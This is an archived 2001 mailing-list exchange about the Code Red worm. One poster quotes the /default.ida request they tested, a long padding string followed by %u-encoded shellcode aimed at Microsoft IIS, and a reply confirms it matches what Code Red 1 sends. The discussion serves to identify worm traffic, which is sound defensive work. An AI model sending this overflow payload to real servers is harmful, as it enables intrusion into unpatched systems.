> does anyone knows what code is exactly sent by infected IIS?
>
> I tested with :
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNN>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
> d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003
> %u8b00%u531b%u53ff%u0078%u0000%u00=a
This is exactly what's sent by Code Red 1, or at least the first part of it.
-- /kinkieReceived on Wed Aug 08 2001 - 16:09:49 MDT
This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:01:30 MST